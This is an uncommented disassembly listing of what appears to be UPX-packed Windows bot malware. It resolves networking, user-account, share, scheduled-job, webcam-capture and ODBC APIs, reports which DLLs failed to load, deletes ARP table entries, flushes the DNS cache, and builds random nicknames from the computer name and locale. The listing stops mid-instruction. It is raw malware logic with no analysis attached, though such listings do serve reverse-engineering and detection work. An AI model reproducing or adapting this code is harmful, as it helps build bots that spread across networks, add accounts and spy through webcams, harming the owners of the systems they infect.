aGethostbyaddr ; "gethostbyaddr" push edi mov ds:dword_4CB6D8, eax call esi ; GetProcAddress push offset aGetpeername ; "getpeername" push edi mov ds:dword_4CB60C, eax call esi ; GetProcAddress push offset aClosesocket ; "closesocket" push edi mov ds:dword_4CB5A8, eax call esi ; GetProcAddress cmp ds:dword_4CB5C4, ebx mov ds:dword_4CB6EC, eax jz loc_40A2E8 cmp ds:dword_4CB6F8, ebx jz loc_40A2E8 cmp ds:dword_4CB564, ebx jz loc_40A2E8 cmp ds:dword_4CB600, ebx jz loc_40A2E8 cmp ds:dword_4CB5E8, ebx jz loc_40A2E8 cmp ds:dword_4CB5AC, ebx jz loc_40A2E8 cmp ds:dword_4CB6D4, ebx jz loc_40A2E8 cmp ds:dword_4CB6F0, ebx jz loc_40A2E8 cmp ds:dword_4CB5FC, ebx jz loc_40A2E8 cmp ds:dword_4CB6E0, ebx jz loc_40A2E8 cmp ds:dword_4CB694, ebx jz loc_40A2E8 cmp ds:dword_4CB654, ebx jz loc_40A2E8 cmp ds:dword_4CB650, ebx jz loc_40A2E8 cmp ds:dword_4CB584, ebx jz short loc_40A2E8 cmp ds:dword_4CB6A4, ebx jz short loc_40A2E8 cmp ds:dword_4CB6B8, ebx jz short loc_40A2E8 cmp ds:dword_4CB66C, ebx jz short loc_40A2E8 cmp ds:dword_4CB62C, ebx jz short loc_40A2E8 cmp ds:dword_4CB680, ebx jz short loc_40A2E8 cmp ds:dword_4CB63C, ebx jz short loc_40A2E8 cmp ds:dword_4CB67C, ebx jz short loc_40A2E8 cmp ds:dword_4CB6E8, ebx jz short loc_40A2E8 cmp ds:dword_4CB634, ebx jz short loc_40A2E8 cmp ds:dword_4CB5F8, ebx jz short loc_40A2E8 cmp ds:dword_4CB668, ebx jz short loc_40A2E8 cmp ds:dword_4CB6D8, ebx jz short loc_40A2E8 cmp ds:dword_4CB60C, ebx jz short loc_40A2E8 cmp eax, ebx jnz short loc_40A2F2 jmp short loc_40A2E8 ; --------------------------------------------------------------------------- loc_40A2DD: ; CODE XREF: sub_409B13+51Fj call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB738, eax loc_40A2E8: ; CODE XREF: sub_409B13+6BEj ; sub_409B13+6CAj ... mov ds:dword_4CB734, 1 loc_40A2F2: ; CODE XREF: sub_409B13+7C6j push offset aWininet_dll ; "wininet.dll" call ebp ; LoadLibraryA mov edi, eax cmp edi, ebx jz loc_40A3F7 push offset aInternetgetcon ; "InternetGetConnectedState" push edi call esi ; GetProcAddress push offset aInternetgetc_0 ; "InternetGetConnectedStateEx" push edi mov ds:dword_4CB590, eax call esi ; GetProcAddress push offset aHttpopenreques ; "HttpOpenRequestA" push edi mov ds:dword_4CB518, eax call esi ; GetProcAddress push offset aHttpsendreques ; "HttpSendRequestA" push edi mov ds:dword_4CB61C, eax call esi ; GetProcAddress push offset aInternetconnec ; "InternetConnectA" push edi mov ds:dword_4CB5C8, eax call esi ; GetProcAddress push offset aInternetopena ; "InternetOpenA" push edi mov ds:dword_4CB628, eax call esi ; GetProcAddress push offset aInternetopenur ; "InternetOpenUrlA" push edi mov ds:dword_4CB5EC, eax call esi ; GetProcAddress push offset aInternetcracku ; "InternetCrackUrlA" push edi mov ds:dword_4CB558, eax call esi ; GetProcAddress push offset aInternetreadfi ; "InternetReadFile" push edi mov ds:dword_4CB550, eax call esi ; GetProcAddress push offset aInternetcloseh ; "InternetCloseHandle" push edi mov ds:dword_4CB560, eax call esi ; GetProcAddress cmp ds:dword_4CB590, ebx mov ecx, ds:dword_4CB5EC mov ds:dword_4CB688, eax jz short loc_40A3D3 cmp ds:dword_4CB518, ebx jz short loc_40A3D3 cmp ds:dword_4CB61C, ebx jz short loc_40A3D3 cmp ds:dword_4CB5C8, ebx jz short loc_40A3D3 cmp ds:dword_4CB628, ebx jz short loc_40A3D3 cmp ecx, ebx jz short loc_40A3D3 cmp ds:dword_4CB558, ebx jz short loc_40A3D3 cmp ds:dword_4CB550, ebx jz short loc_40A3D3 cmp ds:dword_4CB560, ebx jz short loc_40A3D3 cmp eax, ebx jnz short loc_40A3DD loc_40A3D3: ; CODE XREF: sub_409B13+87Ej ; sub_409B13+886j ... mov ds:dword_4CB73C, 1 loc_40A3DD: ; CODE XREF: sub_409B13+8BEj cmp ecx, ebx jz short loc_40A412 push ebx push ebx push ebx push ebx push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)" call ecx ; InternetOpenA cmp eax, ebx mov ds:dword_4CB604, eax jnz short loc_40A412 jmp short loc_40A40C ; --------------------------------------------------------------------------- loc_40A3F7: ; CODE XREF: sub_409B13+7EAj call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB740, eax mov ds:dword_4CB73C, 1 loc_40A40C: ; CODE XREF: sub_409B13+8E2j mov ds:dword_4CB604, ebx loc_40A412: ; CODE XREF: sub_409B13+8CCj ; sub_409B13+8E0j push offset aIcmp_dll ; "icmp.dll" call ebp ; LoadLibraryA mov edi, eax cmp edi, ebx jz short loc_40A45C push offset aIcmpcreatefile ; "IcmpCreateFile" push edi call esi ; GetProcAddress push offset aIcmpclosehandl ; "IcmpCloseHandle" push edi mov ds:dword_4CB5DC, eax call esi ; GetProcAddress push offset aIcmpsendecho ; "IcmpSendEcho" push edi mov ds:dword_4CB70C, eax call esi ; GetProcAddress cmp ds:dword_4CB5DC, ebx mov ds:dword_4CB56C, eax jz short loc_40A467 cmp ds:dword_4CB70C, ebx jz short loc_40A467 cmp eax, ebx jnz short loc_40A471 jmp short loc_40A467 ; --------------------------------------------------------------------------- loc_40A45C: ; CODE XREF: sub_409B13+90Aj call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB748, eax loc_40A467: ; CODE XREF: sub_409B13+939j ; sub_409B13+941j ... mov ds:dword_4CB744, 1 loc_40A471: ; CODE XREF: sub_409B13+945j push offset aNetapi32_dll ; "netapi32.dll" call ebp ; LoadLibraryA mov edi, eax cmp edi, ebx jz loc_40A578 push offset aNetshareadd ; "NetShareAdd" push edi call esi ; GetProcAddress push offset aNetsharedel ; "NetShareDel" push edi mov ds:dword_4CB548, eax call esi ; GetProcAddress push offset aNetshareenum ; "NetShareEnum" push edi mov ds:dword_4CB520, eax call esi ; GetProcAddress push offset aNetschedulejob ; "NetScheduleJobAdd" push edi mov ds:dword_4CB598, eax call esi ; GetProcAddress push offset aNetapibufferfr ; "NetApiBufferFree" push edi mov ds:dword_4CB5CC, eax call esi ; GetProcAddress push offset aNetremotetod ; "NetRemoteTOD" push edi mov ds:dword_4CB6E4, eax call esi ; GetProcAddress push offset aNetuseradd ; "NetUserAdd" push edi mov ds:dword_4CB580, eax call esi ; GetProcAddress push offset aNetuserdel ; "NetUserDel" push edi mov ds:dword_4CB52C, eax call esi ; GetProcAddress push offset aNetuserenum ; "NetUserEnum" push edi mov ds:dword_4CB51C, eax call esi ; GetProcAddress push offset aNetusergetinfo ; "NetUserGetInfo" push edi mov ds:dword_4CB5B4, eax call esi ; GetProcAddress push offset aNetmessagebuff ; "NetMessageBufferSend" push edi mov ds:dword_4CB6AC, eax call esi ; GetProcAddress push offset aNetwkstagetinf ; "NetWkstaGetInfo" push edi mov ds:dword_4CB664, eax call esi ; GetProcAddress cmp ds:dword_4CB548, ebx mov ds:dword_4CB588, eax jz short loc_40A583 cmp ds:dword_4CB520, ebx jz short loc_40A583 cmp ds:dword_4CB598, ebx jz short loc_40A583 cmp ds:dword_4CB5CC, ebx jz short loc_40A583 cmp ds:dword_4CB6E4, ebx jz short loc_40A583 cmp ds:dword_4CB580, ebx jz short loc_40A583 cmp ds:dword_4CB52C, ebx jz short loc_40A583 cmp ds:dword_4CB51C, ebx jz short loc_40A583 cmp ds:dword_4CB5B4, ebx jz short loc_40A583 cmp ds:dword_4CB6AC, ebx jz short loc_40A583 cmp ds:dword_4CB664, ebx jnz short loc_40A58D jmp short loc_40A583 ; --------------------------------------------------------------------------- loc_40A578: ; CODE XREF: sub_409B13+969j call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB750, eax loc_40A583: ; CODE XREF: sub_409B13+A11j ; sub_409B13+A19j ... mov ds:dword_4CB74C, 1 loc_40A58D: ; CODE XREF: sub_409B13+A61j push offset aDnsapi_dll ; "dnsapi.dll" call ebp ; LoadLibraryA mov edi, eax cmp edi, ebx jz short loc_40A5C2 push offset aDnsflushresolv ; "DnsFlushResolverCache" push edi call esi ; GetProcAddress push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A" push edi mov ds:dword_4CB570, eax call esi ; GetProcAddress cmp ds:dword_4CB570, ebx mov ds:dword_4CB64C, eax jz short loc_40A5CD cmp eax, ebx jnz short loc_40A5D7 jmp short loc_40A5CD ; --------------------------------------------------------------------------- loc_40A5C2: ; CODE XREF: sub_409B13+A85j call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB758, eax loc_40A5CD: ; CODE XREF: sub_409B13+AA7j ; sub_409B13+AADj mov ds:dword_4CB754, 1 loc_40A5D7: ; CODE XREF: sub_409B13+AABj push offset aIphlpapi_dll ; "iphlpapi.dll" call ebp ; LoadLibraryA mov edi, eax cmp edi, ebx jz short loc_40A60C push offset aGetipnettable ; "GetIpNetTable" push edi call esi ; GetProcAddress push offset aDeleteipnetent ; "DeleteIpNetEntry" push edi mov ds:dword_4CB6D0, eax call esi ; GetProcAddress cmp ds:dword_4CB6D0, ebx mov ds:dword_4CB6CC, eax jz short loc_40A617 cmp eax, ebx jnz short loc_40A621 jmp short loc_40A617 ; --------------------------------------------------------------------------- loc_40A60C: ; CODE XREF: sub_409B13+ACFj call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB760, eax loc_40A617: ; CODE XREF: sub_409B13+AF1j ; sub_409B13+AF7j mov ds:dword_4CB75C, 1 loc_40A621: ; CODE XREF: sub_409B13+AF5j push offset aMpr_dll ; "mpr.dll" call ebp ; LoadLibraryA mov edi, eax cmp edi, ebx jz short loc_40A680 push offset aWnetaddconnect ; "WNetAddConnection2A" push edi call esi ; GetProcAddress push offset aWnetaddconne_0 ; "WNetAddConnection2W" push edi mov ds:dword_4CB6FC, eax call esi ; GetProcAddress push offset aWnetcancelconn ; "WNetCancelConnection2A" push edi mov ds:dword_4CB6F4, eax call esi ; GetProcAddress push offset aWnetcancelco_0 ; "WNetCancelConnection2W" push edi mov ds:dword_4CB6BC, eax call esi ; GetProcAddress cmp ds:dword_4CB6FC, ebx mov ds:dword_4CB58C, eax jz short loc_40A68B cmp ds:dword_4CB6F4, ebx jz short loc_40A68B cmp ds:dword_4CB6BC, ebx jz short loc_40A68B cmp eax, ebx jnz short loc_40A695 jmp short loc_40A68B ; --------------------------------------------------------------------------- loc_40A680: ; CODE XREF: sub_409B13+B19j call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB768, eax loc_40A68B: ; CODE XREF: sub_409B13+B55j ; sub_409B13+B5Dj ... mov ds:dword_4CB764, 1 loc_40A695: ; CODE XREF: sub_409B13+B69j push offset aShell32_dll ; "shell32.dll" call ebp ; LoadLibraryA mov edi, eax cmp edi, ebx jz short loc_40A6CA push offset aShellexecutea ; "ShellExecuteA" push edi call esi ; GetProcAddress push offset aShchangenotify ; "SHChangeNotify" push edi mov ds:dword_4CB5C0, eax call esi ; GetProcAddress cmp ds:dword_4CB5C0, ebx mov ds:dword_4CB6C8, eax jz short loc_40A6D5 cmp eax, ebx jnz short loc_40A6DF jmp short loc_40A6D5 ; --------------------------------------------------------------------------- loc_40A6CA: ; CODE XREF: sub_409B13+B8Dj call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB770, eax loc_40A6D5: ; CODE XREF: sub_409B13+BAFj ; sub_409B13+BB5j mov ds:dword_4CB76C, 1 loc_40A6DF: ; CODE XREF: sub_409B13+BB3j push offset aOdbc32_dll ; "odbc32.dll" call ebp ; LoadLibraryA mov edi, eax cmp edi, ebx jz short loc_40A768 push offset aSqldriverconne ; "SQLDriverConnect" push edi call esi ; GetProcAddress push offset aSqlsetenvattr ; "SQLSetEnvAttr" push edi mov ds:dword_4CB690, eax call esi ; GetProcAddress push offset aSqlexecdirect ; "SQLExecDirect" push edi mov ds:dword_4CB6DC, eax call esi ; GetProcAddress push offset aSqlallochandle ; "SQLAllocHandle" push edi mov ds:dword_4CB618, eax call esi ; GetProcAddress push offset aSqlfreehandle ; "SQLFreeHandle" push edi mov ds:dword_4CB5D0, eax call esi ; GetProcAddress push offset aSqldisconnect ; "SQLDisconnect" push edi mov ds:dword_4CB670, eax call esi ; GetProcAddress cmp ds:dword_4CB690, ebx mov ds:dword_4CB5E0, eax jz short loc_40A773 cmp ds:dword_4CB6DC, ebx jz short loc_40A773 cmp ds:dword_4CB618, ebx jz short loc_40A773 cmp ds:dword_4CB5D0, ebx jz short loc_40A773 cmp ds:dword_4CB670, ebx jz short loc_40A773 cmp eax, ebx jnz short loc_40A77D jmp short loc_40A773 ; --------------------------------------------------------------------------- loc_40A768: ; CODE XREF: sub_409B13+BD7j call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB778, eax loc_40A773: ; CODE XREF: sub_409B13+C2Dj ; sub_409B13+C35j ... mov ds:dword_4CB774, 1 loc_40A77D: ; CODE XREF: sub_409B13+C51j push offset aAvicap32_dll ; "avicap32.dll" call ebp ; LoadLibraryA mov edi, eax cmp edi, ebx jz short loc_40A7B2 push offset aCapcreatecaptu ; "capCreateCaptureWindowA" push edi call esi ; GetProcAddress push offset aCapgetdriverde ; "capGetDriverDescriptionA" push edi mov ds:dword_4CB5A4, eax call esi ; GetProcAddress cmp ds:dword_4CB5A4, ebx mov ds:dword_4CB684, eax jz short loc_40A7BD cmp eax, ebx jnz short loc_40A7C7 jmp short loc_40A7BD ; --------------------------------------------------------------------------- loc_40A7B2: ; CODE XREF: sub_409B13+C75j call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4CB780, eax loc_40A7BD: ; CODE XREF: sub_409B13+C97j ; sub_409B13+C9Dj mov ds:dword_4CB77C, 1 loc_40A7C7: ; CODE XREF: sub_409B13+C9Bj push 1 pop eax pop edi pop esi pop ebp pop ebx retn sub_409B13 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40A7CF proc near ; CODE XREF: sub_401ACD+2537p var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 200h push ebx mov ebx, [ebp+arg_4] push esi xor esi, esi cmp ds:dword_4CB714, esi push edi mov edi, [ebp+arg_8] jz short loc_40A817 push ds:dword_4CB718 lea eax, [ebp+var_200] push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40A817: ; CODE XREF: sub_40A7CF+1Aj cmp ds:dword_4CB71C, esi jz short loc_40A84B push ds:dword_4CB720 lea eax, [ebp+var_200] push offset aUser32_dllFail ; "User32.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40A84B: ; CODE XREF: sub_40A7CF+4Ej cmp ds:dword_4CB724, esi jz short loc_40A87F push ds:dword_4CB728 lea eax, [ebp+var_200] push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40A87F: ; CODE XREF: sub_40A7CF+82j cmp ds:dword_4CB72C, esi jz short loc_40A8B3 push ds:dword_4CB730 lea eax, [ebp+var_200] push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40A8B3: ; CODE XREF: sub_40A7CF+B6j cmp ds:dword_4CB734, esi jz short loc_40A8E7 push ds:dword_4CB738 lea eax, [ebp+var_200] push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40A8E7: ; CODE XREF: sub_40A7CF+EAj cmp ds:dword_4CB73C, esi jz short loc_40A91B push ds:dword_4CB740 lea eax, [ebp+var_200] push offset aWininet_dllFai ; "Wininet.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40A91B: ; CODE XREF: sub_40A7CF+11Ej cmp ds:dword_4CB744, esi jz short loc_40A94F push ds:dword_4CB748 lea eax, [ebp+var_200] push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40A94F: ; CODE XREF: sub_40A7CF+152j cmp ds:dword_4CB74C, esi jz short loc_40A983 push ds:dword_4CB750 lea eax, [ebp+var_200] push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40A983: ; CODE XREF: sub_40A7CF+186j cmp ds:dword_4CB754, esi jz short loc_40A9B7 push ds:dword_4CB758 lea eax, [ebp+var_200] push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40A9B7: ; CODE XREF: sub_40A7CF+1BAj cmp ds:dword_4CB75C, esi jz short loc_40A9EB push ds:dword_4CB760 lea eax, [ebp+var_200] push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40A9EB: ; CODE XREF: sub_40A7CF+1EEj cmp ds:dword_4CB764, esi jz short loc_40AA1F push ds:dword_4CB768 lea eax, [ebp+var_200] push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40AA1F: ; CODE XREF: sub_40A7CF+222j cmp ds:dword_4CB76C, esi jz short loc_40AA53 push ds:dword_4CB770 lea eax, [ebp+var_200] push offset aShell32_dllFai ; "Shell32.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40AA53: ; CODE XREF: sub_40A7CF+256j cmp ds:dword_4CB774, esi jz short loc_40AA87 push ds:dword_4CB778 lea eax, [ebp+var_200] push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40AA87: ; CODE XREF: sub_40A7CF+28Aj cmp ds:dword_4CB77C, esi jz short loc_40AABB push ds:dword_4CB780 lea eax, [ebp+var_200] push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>" push eax call sub_41B886 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 20h loc_40AABB: ; CODE XREF: sub_40A7CF+2BEj lea eax, [ebp+var_200] push offset unk_42DA2C push eax call sub_41B886 cmp [ebp+arg_C], esi pop ecx pop ecx jnz short loc_40AAE8 push esi lea eax, [ebp+var_200] push edi push eax push ebx push [ebp+arg_0] call sub_409A73 add esp, 14h loc_40AAE8: ; CODE XREF: sub_40A7CF+302j lea eax, [ebp+var_200] push eax call sub_4151AD pop ecx pop edi pop esi pop ebx leave retn sub_40A7CF endp ; =============== S U B R O U T I N E ======================================= sub_40AAFA proc near ; CODE XREF: sub_4017ED+4Fp ; sub_401ACD+5C96p ... arg_0 = dword ptr 4 push [esp+arg_0] call ds:dword_4CB694 ; inet_addr cmp eax, 0FFFFFFFFh jnz short locret_40AB22 push [esp+arg_0] call ds:dword_4CB6D8 ; gethostbyname test eax, eax jnz short loc_40AB1B or eax, 0FFFFFFFFh retn ; --------------------------------------------------------------------------- loc_40AB1B: ; CODE XREF: sub_40AAFA+1Bj mov eax, [eax+0Ch] mov eax, [eax] mov eax, [eax] locret_40AB22: ; CODE XREF: sub_40AAFA+Dj retn sub_40AAFA endp ; =============== S U B R O U T I N E ======================================= sub_40AB23 proc near ; CODE XREF: sub_4017ED+D6p mov ecx, ds:dword_4CB570 xor eax, eax test ecx, ecx jz short locret_40AB31 call ecx ; DnsFlushResolverCache locret_40AB31: ; CODE XREF: sub_40AB23+Aj retn sub_40AB23 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40AB32 proc near ; CODE XREF: sub_401ACD:loc_403F5Ep var_88 = byte ptr -88h var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 88h push ebx push esi push edi push 1 pop ebx lea eax, [ebp+var_8] xor edi, edi push ebx push eax push edi xor esi, esi mov [ebp+var_8], edi mov [ebp+var_4], ebx call ds:dword_4CB6D0 ; GetIpNetTable mov ecx, eax sub ecx, edi jz loc_40ABF8 sub ecx, 32h jz loc_40ABF1 sub ecx, 48h jz short loc_40AB92 sub ecx, 6Eh jz short loc_40AB8B loc_40AB74: ; CODE XREF: sub_40AB32+8Bj push eax lea eax, [ebp+var_88] push offset unk_42DC40 push eax call sub_41B886 add esp, 0Ch jmp short loc_40ABD2 ; --------------------------------------------------------------------------- loc_40AB8B: ; CODE XREF: sub_40AB32+40j push offset unk_42DC1C jmp short loc_40ABC4 ; --------------------------------------------------------------------------- loc_40AB92: ; CODE XREF: sub_40AB32+3Bj push [ebp+var_8] call sub_41B4D5 push [ebp+var_8] mov esi, eax push edi push esi call sub_41B590 add esp, 10h cmp esi, edi jz short loc_40ABBF lea eax, [ebp+var_8] push ebx push eax push esi call ds:dword_4CB6D0 ; GetIpNetTable cmp eax, edi jz short loc_40ABF8 jmp short loc_40AB74 ; --------------------------------------------------------------------------- loc_40ABBF: ; CODE XREF: sub_40AB32+79j push offset unk_42DBEC loc_40ABC4: ; CODE XREF: sub_40AB32+5Ej ; sub_40AB32+C4j lea eax, [ebp+var_88] push eax call sub_41B886 pop ecx pop ecx loc_40ABD2: ; CODE XREF: sub_40AB32+57j lea eax, [ebp+var_88] mov [ebp+var_4], edi push eax call sub_4151AD pop ecx loc_40ABE2: ; CODE XREF: sub_40AB32+C8j ; sub_40AB32+DCj push esi call sub_41B0B1 mov eax, [ebp+var_4] pop ecx pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_40ABF1: ; CODE XREF: sub_40AB32+32j push offset unk_42DBBC jmp short loc_40ABC4 ; --------------------------------------------------------------------------- loc_40ABF8: ; CODE XREF: sub_40AB32+29j ; sub_40AB32+89j cmp [esi], edi jbe short loc_40ABE2 lea ebx, [esi+4] loc_40ABFF: ; CODE XREF: sub_40AB32+DAj push ebx call ds:dword_4CB6CC ; DeleteIpNetEntry inc edi add ebx, 18h cmp edi, [esi] jb short loc_40ABFF jmp short loc_40ABE2 sub_40AB32 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40AC10 proc near ; CODE XREF: sub_401ACD+2248p ; sub_401ACD+2399p ... var_14 = byte ptr -14h var_10 = byte ptr -10h var_F = byte ptr -0Fh var_E = byte ptr -0Eh var_D = byte ptr -0Dh var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 14h push esi push 10h pop eax mov [ebp+var_4], eax push eax lea eax, [ebp+var_14] push 0 push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_4] push eax lea eax, [ebp+var_14] push eax push [ebp+arg_0] call ds:dword_4CB5F8 ; getsockname movzx eax, [ebp+var_D] push eax mov esi, offset dword_4CB784 movzx eax, [ebp+var_E] push eax movzx eax, [ebp+var_F] push eax movzx eax, [ebp+var_10] push eax push offset aD_D_D_D ; "%d.%d.%d.%d" push esi call sub_41B886 add esp, 18h mov eax, esi pop esi leave retn sub_40AC10 endp ; =============== S U B R O U T I N E ======================================= sub_40AC69 proc near ; CODE XREF: sub_412B09+24Cp ; sub_412B09+292p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi mov esi, [esp+4+arg_4] xor eax, eax cmp esi, 1 jle short loc_40AC92 mov ecx, esi push edi shr ecx, 1 mov edx, ecx neg edx lea esi, [esi+edx*2] mov edx, [esp+8+arg_0] loc_40AC85: ; CODE XREF: sub_40AC69+24j movzx edi, word ptr [edx] add eax, edi inc edx inc edx dec ecx jnz short loc_40AC85 pop edi jmp short loc_40AC96 ; --------------------------------------------------------------------------- loc_40AC92: ; CODE XREF: sub_40AC69+Aj mov edx, [esp+4+arg_0] loc_40AC96: ; CODE XREF: sub_40AC69+27j test esi, esi pop esi jz short loc_40ACA0 movzx ecx, byte ptr [edx] add eax, ecx loc_40ACA0: ; CODE XREF: sub_40AC69+30j mov ecx, eax and eax, 0FFFFh shr ecx, 10h add ecx, eax mov eax, ecx shr eax, 10h add eax, ecx not eax retn sub_40AC69 endp ; =============== S U B R O U T I N E ======================================= sub_40ACB6 proc near ; CODE XREF: sub_40B08E+49p ; DATA XREF: UPX0:off_42DC88o arg_0 = dword ptr 4 push esi push edi call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 pop ecx call sub_41B8E2 xor edx, edx mov ecx, 48Fh div ecx mov edi, [esp+8+arg_0] push off_42DCF0[edx*4] push offset aS_2 ; "%s" push 1Ch push edi call sub_41B980 xor esi, esi add esp, 10h cmp dword_429098, esi jle short loc_40AD1E loc_40ACF8: ; CODE XREF: sub_40ACB6+66j call sub_41B8E2 push 0Ah cdq pop ecx idiv ecx push edx push edi push offset dword_42BB64 push 1Ch push edi call sub_41B980 add esp, 14h inc esi cmp esi, dword_429098 jl short loc_40ACF8 loc_40AD1E: ; CODE XREF: sub_40ACB6+40j mov eax, edi pop edi pop esi retn sub_40ACB6 endp ; --------------------------------------------------------------------------- push esi push edi call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 mov edi, [esp+10h] mov dword ptr [esp], offset asc_429140 ; "-" push offset aS_2 ; "%s" push 1Ch push edi call sub_41B980 xor esi, esi add esp, 10h cmp dword_429098, esi jle short loc_40AD7C loc_40AD56: ; CODE XREF: UPX0:0040AD7Aj call sub_41B8E2 push 0Ah cdq pop ecx idiv ecx push edx push edi push offset dword_42BB64 push 1Ch push edi call sub_41B980 add esp, 14h inc esi cmp esi, dword_429098 jl short loc_40AD56 loc_40AD7C: ; CODE XREF: UPX0:0040AD54j mov eax, edi pop edi pop esi retn ; =============== S U B R O U T I N E ======================================= sub_40AD81 proc near ; CODE XREF: sub_401ACD+69CDp arg_0 = dword ptr 4 push ebx push esi push edi call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 pop ecx call sub_41B8E2 push 3 mov ebx, [esp+10h+arg_0] cdq pop ecx xor edi, edi idiv ecx mov esi, edx add esi, dword_429098 test esi, esi jle short loc_40ADC4 loc_40ADAE: ; CODE XREF: sub_40AD81+41j call sub_41B8E2 push 1Ah cdq pop ecx idiv ecx add dl, 61h mov [edi+ebx], dl inc edi cmp edi, esi jl short loc_40ADAE loc_40ADC4: ; CODE XREF: sub_40AD81+2Bj and byte ptr [edi+ebx], 0 pop edi mov eax, ebx pop esi pop ebx retn sub_40AD81 endp ; --------------------------------------------------------------------------- push ebp mov ebp, esp push ecx push ecx and dword ptr [ebp-4], 0 push esi push edi mov dword ptr [ebp-8], 100h call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 pop ecx lea eax, [ebp-8] mov esi, offset byte_431948 push eax push esi call dword_4270C0 ; GetComputerNameA movsx eax, byte_431948 push 41h pop ecx push 1 pop edx loc_40AE0A: ; CODE XREF: UPX0:0040AE15j cmp eax, ecx jnz short loc_40AE11 mov [ebp-4], edx loc_40AE11: ; CODE XREF: UPX0:0040AE0Cj inc ecx cmp ecx, 5Bh jl short loc_40AE0A push 61h pop ecx loc_40AE1A: ; CODE XREF: UPX0:0040AE25j cmp eax, ecx jnz short loc_40AE21 mov [ebp-4], edx loc_40AE21: ; CODE XREF: UPX0:0040AE1Cj inc ecx cmp ecx, 7Bh jl short loc_40AE1A mov edi, [ebp+8] push esi push 1Ch push edi call sub_41B980 xor esi, esi add esp, 0Ch cmp dword_429098, esi jle short loc_40AE66 loc_40AE40: ; CODE XREF: UPX0:0040AE64j call sub_41B8E2 push 0Ah cdq pop ecx idiv ecx push edx push edi push offset dword_42BB64 push 1Ch push edi call sub_41B980 add esp, 14h inc esi cmp esi, dword_429098 jl short loc_40AE40 loc_40AE66: ; CODE XREF: UPX0:0040AE3Ej mov eax, edi pop edi pop esi leave retn ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 0Ch push esi push edi call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 pop ecx lea eax, [ebp-0Ch] push 0Ah push eax push 7 push 800h call dword_4270C4 ; GetLocaleInfoA mov edi, [ebp+8] lea eax, [ebp-0Ch] push eax push offset dword_43194C push 1Ch push edi call sub_41B980 xor esi, esi add esp, 10h cmp dword_429098, esi jle short loc_40AEDB loc_40AEB5: ; CODE XREF: UPX0:0040AED9j call sub_41B8E2 push 0Ah cdq pop ecx idiv ecx push edx push edi push offset dword_42BB64 push 1Ch push edi call sub_41B980 add esp, 14h inc esi cmp esi, dword_429098 jl short loc_40AEB5 loc_40AEDB: ; CODE XREF: UPX0:0040AEB3j mov eax, 